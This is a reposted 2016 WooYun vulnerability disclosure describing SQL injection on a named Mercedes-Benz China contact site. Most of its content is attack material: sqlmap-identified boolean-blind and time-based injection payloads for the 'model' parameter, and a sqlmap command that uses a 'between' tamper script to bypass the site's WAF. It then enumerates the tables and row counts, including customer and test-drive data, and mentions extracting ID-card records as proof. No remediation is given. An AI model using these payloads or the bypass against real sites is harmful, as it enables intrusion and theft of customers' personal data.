神刀安全网

漏洞标题: 汽车安全之奔驰某站SQL注入/可影响大量客户信息(bypass waf)

漏洞详情

披露状态:

2016-04-21: 细节已通知厂商并且等待厂商处理中
2016-04-21: 厂商已经确认,细节仅向厂商公开
2016-05-01: 细节向核心白帽子及相关领域专家公开
2016-05-11: 细节向普通白帽子公开
2016-05-21: 细节向实习白帽子公开
2016-06-05: 细节向公众公开

简要描述:

详细说明:

注入点:https://contact.mercedes-benz.com.cn/brochure/step2/?model=16&language=cn

code 区域
sqlmap identified the following injection point(s) with a total of 60 HTTP(s) requests:
---
Parameter: model (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: model=16) AND 8776=8776 AND (8606=8606&language=cn

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: model=16) AND (SELECT * FROM (SELECT(SLEEP(5)))Fzth) AND (7771=7771&language=cn
---
web server operating system: Linux
web application technology: Apache
back-end DBMS: MySQL 5.0.12

有过滤。

爆当前数据库的时候需要添加脚本between!!!!

sqlmap.py -u "https://contact.mercedes-benz.com.cn/brochure/step2/?model=16&language=cn" –batch –random-agent –tamper=between –current-db

code 区域
Database: db_contactnew
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| ci_statistical_page | 20997746 |
| ci_statistical_model | 1332505 |
| ci_statistical_brochure | 632541 |
| ci_statistical_pricelist | 194508 |
| ci_brochure | 135619 |
| bak_ci_preownd_20160315 | 43942 |
| ci_preownd | 42708 |
| ci_test_drive_20160415 | 39587 |
| ci_test_drive | 30309 |
| ci_newsletter | 4996 |
| ci_email | 4609 |
| ci_campaignairchina | 1906 |
| ci_arena_form | 643 |
| ci_dealer | 505 |
| ci_model_class | 485 |
| ci_city | 461 |
| ci_dealer_bak | 213 |
| ci_ib_modeldata_feature | 154 |
| ci_user_weiboapp | 91 |
| ci_model_preowned | 74 |
| ci_presale | 68 |
| ci_model_brochure | 54 |
| ci_model | 48 |
| ci_wallpaper | 48 |
| ci_z | 48 |
| ci_arena_events | 45 |
| ci_model_pricelist | 44 |
| ci_model_brand | 36 |
| ci_province | 34 |
| ci_ib_modeldata_technical | 27 |
| ci_model_bodytype | 22 |
| ci_user | 4 |
+---------------------------+---------+

数据量不小哦!

来看下一些隐私信息,4万多:

漏洞标题:  汽车安全之奔驰某站SQL注入/可影响大量客户信息(bypass waf)

用户身份证信息,只爆3条记录作为证明

漏洞标题:  汽车安全之奔驰某站SQL注入/可影响大量客户信息(bypass waf)

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 汽车安全之奔驰某站SQL注入/可影响大量客户信息(bypass waf)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址